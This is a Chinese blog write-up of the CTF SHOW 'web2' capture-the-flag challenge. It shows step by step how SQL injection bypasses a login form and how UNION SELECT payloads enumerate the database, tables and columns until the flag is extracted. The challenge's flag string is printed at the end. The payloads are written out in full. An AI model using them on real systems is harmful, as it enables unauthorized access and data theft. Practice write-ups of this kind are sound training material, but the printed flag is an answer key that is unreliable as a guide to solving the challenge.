CTF SHOW web2

最新推荐文章于 2024-04-28 12:17:27 发布

M's blog

最新推荐文章于 2024-04-28 12:17:27 发布

阅读量409

点赞数 6

文章标签： sql web安全网络安全

本文链接：https://blog.csdn.net/2301_77001831/article/details/136006736

版权

本文描述了一次针对容器应用的SQL注入过程，从发现注入点开始，逐步利用联合查询获取数据库名、表名、字段名，最终获取敏感信息并展示了CTF旗标。

摘要由CSDN通过智能技术生成

打开容器发现就两个输入框，根据提示是sql注入题目，先尝试找注入点，在用户名输入框中，先用万能注入方式尝试。用1' or 1=1#登陆成功。

接着联合查询，直接爆出数据库。

1' or 1=1 union select 1,database(),3;#

数据库名为web2，接着报表。发现返回结果为2，说明有两个表。

1' or 1=1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database(); #

先看第一个表名，得到表名为flag。

 1' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema='web2' limit 0,1),3;#

接着查看字段名，得到字段名为flag。

1' or 1=1 union select 1,(select column_name from information_schema.columns where table_name="flag"),3; #

接着爆出字段值。

1' or 1=1 union select 1,(select flag from web2.flag),3;#

拿到flag。ctfshow{65e1afa7-d76b-4f73-b90a-0d7a3f353725}

关注